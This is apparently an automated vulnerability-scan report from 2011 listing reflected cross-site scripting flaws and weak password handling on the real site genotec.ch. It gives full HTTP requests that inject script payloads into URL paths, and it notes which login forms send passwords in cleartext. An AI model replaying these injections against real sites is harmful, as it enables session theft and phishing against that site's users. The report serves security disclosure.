XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, genotec.ch

Report generated by XSS.CX at Sat Aug 20 09:07:34 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in genotec.ch, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://www.genotec.ch/de/application-hosting/ [REST URL parameter 1]

1.2. http://www.genotec.ch/de/application-hosting/ [REST URL parameter 2]

1.3. http://www.genotec.ch/en/genotec/company/ [REST URL parameter 1]

1.4. http://www.genotec.ch/en/genotec/company/ [REST URL parameter 2]

1.5. http://www.genotec.ch/en/genotec/company/ [REST URL parameter 3]

1.6. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/ [REST URL parameter 1]

1.7. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/ [REST URL parameter 2]

1.8. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/ [REST URL parameter 3]

1.9. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/ [REST URL parameter 4]

1.10. http://www.genotec.ch/favicon.ico [REST URL parameter 1]

2. Cleartext submission of password

3. Password field with autocomplete enabled

3.1. http://www.genotec.ch/

3.2. http://www.genotec.ch/

3.3. http://www.genotec.ch/

4. Cross-domain POST

4.1. http://www.genotec.ch/

4.2. http://www.genotec.ch/

4.3. http://www.genotec.ch/

5. Cross-domain script include

5.1. http://www.genotec.ch/

5.2. http://www.genotec.ch/de/application-hosting/

5.3. http://www.genotec.ch/en/genotec/company/

5.4. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/

6. TRACE method is enabled

7. Robots.txt file



1. Cross-site scripting (reflected)  next
There are 10 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.genotec.ch/de/application-hosting/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /de/application-hosting/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b4b7"><script>alert(1)</script>c2baf3334be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de2b4b7"><script>alert(1)</script>c2baf3334be/application-hosting/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.genotec.ch/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic; __utmb=202063495

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/de2b4b7"><script>alert(1)</script>c2baf3334be/application-hosting/" type="text" size="30">
...[SNIP]...

1.2. http://www.genotec.ch/de/application-hosting/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /de/application-hosting/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea19a"><script>alert(1)</script>1eb29e68eec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/application-hostingea19a"><script>alert(1)</script>1eb29e68eec/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.genotec.ch/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic; __utmb=202063495

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/de/application-hostingea19a"><script>alert(1)</script>1eb29e68eec/" type="text" size="30">
...[SNIP]...

1.3. http://www.genotec.ch/en/genotec/company/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /en/genotec/company/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 800e3"><script>alert(1)</script>3de44df417e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en800e3"><script>alert(1)</script>3de44df417e/genotec/company/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmb=202063495; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/en800e3"><script>alert(1)</script>3de44df417e/genotec/company/" type="text" size="30">
...[SNIP]...

1.4. http://www.genotec.ch/en/genotec/company/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /en/genotec/company/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13472"><script>alert(1)</script>2e42837cd75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/genotec13472"><script>alert(1)</script>2e42837cd75/company/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmb=202063495; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/en/genotec13472"><script>alert(1)</script>2e42837cd75/company/" type="text" size="30">
...[SNIP]...

1.5. http://www.genotec.ch/en/genotec/company/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /en/genotec/company/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53042"><script>alert(1)</script>2a005d71e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/genotec/company53042"><script>alert(1)</script>2a005d71e0/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmb=202063495; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/en/genotec/company53042"><script>alert(1)</script>2a005d71e0/" type="text" size="30">
...[SNIP]...

1.6. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /en/genotec/company/general-terms-and-conditions/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7265c"><script>alert(1)</script>1e5a444cadf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en7265c"><script>alert(1)</script>1e5a444cadf/genotec/company/general-terms-and-conditions/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.genotec.ch/en/genotec/company/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic; __utmb=202063495

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/en7265c"><script>alert(1)</script>1e5a444cadf/genotec/company/general-terms-and-conditions/" type="text" size="30">
...[SNIP]...

1.7. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /en/genotec/company/general-terms-and-conditions/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12375"><script>alert(1)</script>35f1f2e3ce0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/genotec12375"><script>alert(1)</script>35f1f2e3ce0/company/general-terms-and-conditions/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.genotec.ch/en/genotec/company/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic; __utmb=202063495

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/en/genotec12375"><script>alert(1)</script>35f1f2e3ce0/company/general-terms-and-conditions/" type="text" size="30">
...[SNIP]...

1.8. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /en/genotec/company/general-terms-and-conditions/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80068"><script>alert(1)</script>21771cc074f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/genotec/company80068"><script>alert(1)</script>21771cc074f/general-terms-and-conditions/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.genotec.ch/en/genotec/company/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic; __utmb=202063495

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/en/genotec/company80068"><script>alert(1)</script>21771cc074f/general-terms-and-conditions/" type="text" size="30">
...[SNIP]...

1.9. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /en/genotec/company/general-terms-and-conditions/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6af94"><script>alert(1)</script>e4c6f504c55 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/genotec/company/general-terms-and-conditions6af94"><script>alert(1)</script>e4c6f504c55/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.genotec.ch/en/genotec/company/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic; __utmb=202063495

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/en/genotec/company/general-terms-and-conditions6af94"><script>alert(1)</script>e4c6f504c55/" type="text" size="30">
...[SNIP]...

1.10. http://www.genotec.ch/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93eac"><script>alert(1)</script>d4b586fbf23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico93eac"><script>alert(1)</script>d4b586fbf23 HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmb=202063495; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Aug 2011 15:04:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 8676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<input name="goto" id="search" value="/favicon.ico93eac"><script>alert(1)</script>d4b586fbf23" type="text" size="30">
...[SNIP]...

2. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET / HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:03:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 06:19:05 GMT
ETag: "1d2dbf4-3531-4a97fb980a840"
Accept-Ranges: bytes
Content-Length: 13617
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content
...[SNIP]...
<div id="loginbox-center-wc" style="display:none;" class="tab">
       <FORM name="webcreator" action="http://www1.genotec.ch/webcreator.asp" method="post" target="_blank">
       <INPUT type="hidden" value="yes" name="weblogin">
...[SNIP]...
</p>
    <input type="password" name="passwort">
       <br /
       <p>
...[SNIP]...

3. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


3.1. http://www.genotec.ch/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:03:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 06:19:05 GMT
ETag: "1d2dbf4-3531-4a97fb980a840"
Accept-Ranges: bytes
Content-Length: 13617
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content
...[SNIP]...
<div id="loginbox-center-hcc" style="display:none;" class="tab">
       <FORM name="hcc" action="https://hcc.genotec.ch" method="post" target="_blank">
       <h1>
...[SNIP]...
</p>
    <input type="password" name="strPasswort">
       <br />
...[SNIP]...

3.2. http://www.genotec.ch/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:03:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 06:19:05 GMT
ETag: "1d2dbf4-3531-4a97fb980a840"
Accept-Ranges: bytes
Content-Length: 13617
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content
...[SNIP]...
<div id="loginbox-center-wc" style="display:none;" class="tab">
       <FORM name="webcreator" action="http://www1.genotec.ch/webcreator.asp" method="post" target="_blank">
       <INPUT type="hidden" value="yes" name="weblogin">
...[SNIP]...
</p>
    <input type="password" name="passwort">
       <br /
       <p>
...[SNIP]...

3.3. http://www.genotec.ch/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:03:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 06:19:05 GMT
ETag: "1d2dbf4-3531-4a97fb980a840"
Accept-Ranges: bytes
Content-Length: 13617
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content
...[SNIP]...
<div id="loginbox-center-webmail" style="display:block;" class="tab">
       <FORM name="webmail" action="https://webmail.genotec.ch" method="post" target="_blank">
       <INPUT type="hidden"" value="login" name="_action">
...[SNIP]...
</p>
    <input type="password" name="password">
    <p>
...[SNIP]...

4. Cross-domain POST  previous  next
There are 3 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


4.1. http://www.genotec.ch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue detail

